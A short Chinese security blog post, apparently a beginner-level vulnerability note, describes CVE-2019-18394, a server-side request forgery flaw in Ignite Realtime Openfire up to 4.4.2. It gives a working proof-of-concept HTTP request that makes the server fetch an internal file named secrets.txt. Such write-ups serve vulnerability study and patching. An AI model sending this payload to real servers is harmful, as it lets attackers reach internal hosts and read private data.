【初级】openfire SSRF

CVE-2019-18394

漏洞描述:Ignite Realtime Openfire 到 4.4.2 中的 FaviconServlet.java 中的服务器端请求伪造 (SSRF) 漏洞允许攻击者发送任意 HTTP GET 请求。
影响版本:Ignite Realtime Openfire 到 4.4.2

参考资料:https://swarm.ptsecurity.com/openfire-admin-console/

POC:

GET /getFavicon?host=192.168.176.1:8080/secrets.txt? HTTP/1.1
Host: assesmenthost.com:9090

© 版权声明
THE END
喜欢就支持一下吧
点赞12赏点小钱 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    请登录后查看评论内容